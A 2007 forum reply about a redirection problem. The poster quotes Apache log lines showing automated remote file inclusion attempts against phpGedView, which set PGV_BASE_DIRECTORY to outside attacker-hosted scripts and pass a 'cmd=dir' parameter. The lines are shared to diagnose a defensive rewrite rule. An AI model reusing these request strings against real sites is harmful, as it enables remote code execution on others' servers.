View Single Post

  #8 (permalink)  
Old 09-10-2007
Reffo
 
Posts: n/a
Default Re: Redirection based on Query string

> Hi Reffo,
>
> Can you post the relevant part of your log file, so I can see what is
> going wrong?
>
> Regards
>
> Ian
>

Hi.

Here's one example:

66.118.176.78 - - [09/Sep/2007:08:35:14 +0200] "GET
/index.php?newlang=norwegian/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt?
HTTP/1.1" 302 340 "-" "libwww-perl/5.807"

66.118.176.78 - - [09/Sep/2007:08:35:19 +0200] "GET
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http ://darkness.ws/xpl/bot/id.txt?
HTTP/1.1" 302 301 "-" "libwww-perl/5.807"

As you see, the person is getting a 302, but is not redirected.

Here's another log where the person is getting a 501 error


cpanel.fs-host.com - - [09/Sep/2007:17:29:14 +0200] "GET
/index.php?name=Downloads&file=details&id=14/phpGedView/individual.php?PGV_BASE_DIRECTORY=http://71.102.93.10/WTS/bin/hak/idpitbull.txt??
HTTP/1.1" 501 215 "-" "libwww-perl/5.808"

cpanel.fs-host.com - - [09/Sep/2007:17:29:15 +0200] "GET
/phpGedView/individual.php?PGV_BASE_DIRECTORY=http://71.102.93.10/WTS/bin/hak/idpitbull.txt??
HTTP/1.1" 501 231 "-" "libwww-perl/5.808"

Regards,
Trond


Reply With Quote